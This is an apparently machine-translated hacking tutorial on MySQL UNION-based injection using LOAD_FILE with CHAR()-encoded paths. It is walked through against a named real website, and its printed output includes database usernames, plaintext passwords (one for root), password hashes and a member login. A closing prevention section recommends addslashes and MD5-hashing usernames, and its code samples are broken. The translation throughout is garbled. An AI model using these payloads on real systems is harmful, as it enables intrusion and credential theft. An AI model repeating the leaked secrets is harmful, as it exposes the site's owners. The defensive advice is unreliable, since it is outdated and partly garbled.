Everyone has always heard that mysql can't query, haha, today I will teach everyone a good way, through this method to achieve the changed cross-library query, the method is to directly read the Data folder in MySQL through Load_file. The file content is achieved, thereby implementing an abnormal cross-library query.
Give an example.
Before this, let's talk about the structure under the mysql Data folder.
There is a folder generated by the database name, and the folder is generated in the folder to generate three complications for FRM, MYD, MYI, such as
There is an alpha database in MySQL, there are two tables in Alphaauthor and Alphadb in the Alpha library.
The alpha folder content is as follows 33
Among them, alphadb.frm places data in the LPhadb table, alphadb.frm places the structure, and the content of alphadb.myi is different with mysql version, and the specific can be used to open with Notepad.
Experiment start
Suppose we know that there is another database Yminfo210 exists, and there is a table user, the user is putting this admin information.
we
http://localhost/site/display.php? id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD_FILE ('Yminfo210 / user.myd'), 4, 5, 6, 7 8, 9, 10, 11
Explanation, the directory where the LOAD_FILE default is the Data directory under MySQL, so we use
Load_file ('yminfo210 / user.myd'), of course, Load_file ('. Info210 / user.myd') is the same, note that the default path of INTO OUTFILE is in the database folder.
The result is shown in Figure 34
We read the content
Hong admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer http://www.yoursite.com (Department of Sui KA of Sui of Sui 127.0.0.1 d |?????? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com? SDFASDFSDFA ASDFADFASD? E 麷 AM 麷 A 127.0.0.1 222 22222223423
Although there is a bunch of garbled, we can still see that the user name is admin, the password is 698D51A19D8A121CE581499D7B701668, which is another information.
In this way, we have achieved the curve cross-library, and the examples below will also be mentioned!
Said so much below us to use it, this test is a famous security site - black and white network
Listening to people saying that black and white vulnerabilities? Let's take a look.
http://www.heibai.net/down/show.php?id=5403 and 1=1
normal display.
Figure 35
http://www.heibai.net/down/show.php?id=5403 and 1=2
The display is not normal.
Figure 36
Ok, we continue
http://www.heibai.net/down/show.php?id=5403 and 1=1 Union Select 1
The result is as follows
Figure 37
Note that there is no display name in the picture, and it is also included.
Warning: mysql_fetch_Object (): Supplied Argument is not a valid mysql result resource in d: /web/heibai/down/show.php on line 45
Warning: mysql_fetch_Array (): Supplied Argument is not a valid mysql result resource in d: /web/heibai/down/global.php on line 578
Dizziness, the website is coming out, then you will die!
We continue until we guessed
http://www.heibai.net/down/show.php?id=5403 and 1=1 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19
Normally it is normal.
Figure 38
Good, our conversion statement has become
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19
Show as shown in Figure 39
Look at the introduction is 12, we can guess that you should be a characteristic!
OK, let's take a look at the file content first
D: /web/heibai/down/show.php is converted to ASCII
Char (100, 58, 47, 119, 101, 98, 47, 104, 101, 105, 98, 97, 105, 47, 100, 111, 119, 110, 47, 115, 104, 111, 119, 46, 112, 104, 112)
we
View-source: http://www.heibai.net/down/show.php? ID = 5403% 20and% 201 = 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, loading_file (100, 58, 47, 119, 101, 98, 47, 105, 47, 100, 111, 119, 110, 47, 115, 104, 111, 119, 46, 112, 104, 11)), 13, 14, 15, 16, 17, 18, 19, 19
View-source: It is an inspection of the source code. As for why it is used, we will tell
Show its source code
Figure 40
Because there is a sentence in Show.php
If we submit them directly in the browser to jump to list.php
We found this request ("./include/config.inc.inc.php");
Good things, you should put this configuration file, OK continues
D: /web/heibai/down/include/config.inc.php
Converted to char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) we enter
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)), 13,14,15,16,17,18, 19
The result is shown in Figure 41
Main content
.......................
YMDown (Night Cat Download System) is a program that applies to the website to provide download services
// ----------------------------------- ---------- //
// Regular setting //
// ----------------------------------- ---------- //
// Database Information
$ dbhost = "localhost"; // Database host name
$ dbuser = "Download"; // Database User Name
$ dbpasswd = "kunstar988"; // database password
$ DBNAME = "Download"; // Database Name
// cookie name
$ cookie_name = "heibai";
// version number
$ Version = "1.0.1";
// Data table name
$ DOWN_TABLE = YMDOWN;
$ DOWN_USER_TABLE = YMDOWN_USER;
$ DOWN_SORT1_TABLE = YMDOWN_SORT1;
$ DOWN_SORT2_TABLE = YMDOWN_SORT2;
Dizzy, use the night cat's download system, and we know
$ dbuser = "Download"; // Database User Name
$ dbpasswd = "kunstar988"; // database password
Maybe it will be useful.
The table name of use is the default table name, we know that the cursor password of the night cat is placed in YMDown_User
We continue http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3 ,username, 5 ,password ,7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 from YMDown_User
The result is shown in Figure 42
According to the prompted we know that the file size is UserName, the application platform is Password (in connection with Figure 36)
Username = DLOAD, Password = 6558428, the backstage of the night cat default in the admin directory, I tried didn't find it for a long time, halo.
I want to directly connect MySQL and find that the Telnet port is not open. Let's take a look else! http://www.heibai.net/vip/Article/login.php
It looks like a member's landing, let's take a look.
D: /web/heibai/vip/Article/login.php
Transform into Char (100, 58, 47, 119, 101, 98, 47, 104, 101, 118, 105, 112, 47, 97, 114, 116, 105, 99, 108, 101, 110, 108, 111, 103, 105, 110, 46, 112, 104, 112)
We entered
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)), 13,14,15,16,17,18,19
The result is shown in Figure 43:
among them
Require ("./include/global.php");
Require ("./include/config.inc.inc.php");
Require ("./mainfunction.php");
REQUIRE ("./function.php");
Of course, let's see config.inc.php.
D: /web/heibai/vip/Article/include/config.inc.php
Converted to char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
enter
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)), 13,14,15, 16,17,18,19
The result is shown in Figure 44
Show a lot of good things.
$ dbhost = "localhost"; // Database host name
$ dbuser = "root"; // Database Username
$ dbpass = "234ytr8ut"; // Database password
$ dbname = "article"; // database name
$ yMCMS_USER_TABLE = "User";
$ yMCMS_USERGROUP_TABLE = "Usergroup";
$ YMCMS_USERRACE_TABLE = "Userrace";
The table is still the default table, and the root password is coming out.
If you can connect to its mysql, then we can find PHPMYADMIN, you can find PHPMYADMIN, no found, may not use it at all.
Read c: /winnt/php.ini discovery
Magic quotes
;
Magic quotes for incoming Get / Post / Cookie Data.
Magic_quotes_GPC = ON
55555555, in pain, let's see if you can engage a few membership accounts.
Guess membership accounts in the User table, we directly read the user.myd file in the Article folder directly.
Article / user.myd converted into
CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 109, 121, 100)
We entered
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD_FILE (CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 109, 121, 100)), 13, 14, 15, 16, 17, 18, 19
The result is shown in Figure 45:
Dizzy, there is no return. Let's read Article / User.frm
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD_FILE (CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 102, 114, 109)), 13, 14, 15, 16, 17, 18, 19
The result is shown in Figure 46
Dizzy, the table structure is, and it is also successful when reading Article / User.myi, but why do article / user.myd can't read it? If you can be Magic_QUOTES_GPC = Off, we can also take a look, but ..... .
Depressed, the test is ended, the following work is still left to you!
The problem described in the article has notified Xingkun!
Four: Preventive methods of PHP MySQL injection.
In the previous topic, there have been a lot of prevention methods. Here I will primarily talk about the prevention method of PHP MySQL injection attack.
Everyone sees that many injection attacks have no effect when magic_quotes_gpc = ON.
We can use this to reinforce our procedure. The addslashes () function is equivalent to magic_quotes_gpc = ON, and it is not conflict with Magic_QUOTES_GPC = ON, we can filter it
$ usrname = addslashes ($ usrname);
$ query = "select * from username where userid = '$ usrname');
For ID types we can use the intVal () function, the intVal () function can convert the variable into an integer type so that it is possible.
We can
$ ID = INTVAL ($ ID);
$ query = "Select * from alphadb where articleid = '$ ID');
If it is a character type?
We can filter it first with addslashes (), then filter "%" and "_". For example:
$ search = addslashes ($ search);
$ search = str_replace ("_", "/ _", $ search);
$ search = STR_REPLACE ("%", "/%", $ search;
Remember, don't replace / // in the case of Magic_QUOTES_GPC = ON, as follows:
$ Password = STR_REPLACE ("//", ", $ password);
I remember to mention this issue in Darkness's article "once in a PHP site" (included in the CD).
There is also a place where you are logging in. If you use only one administrator to manage, we can use MD5 to use MD5 directly, so you don't have to be afraid of injection technology.
UserName = MD5 ($ http_post_vars ["username"]);
Passwd = md5 ($ http_post_vars ["passwd"]);
I am like this in my background.
postscript:
This article says so much, injected is a flexible technology, there are many technologies that continue to develop, there is any questions and opinions to come to the Yanhuang Corps (www.cnwill.com) to come to me, but also welcome the content criticism in the text Correct
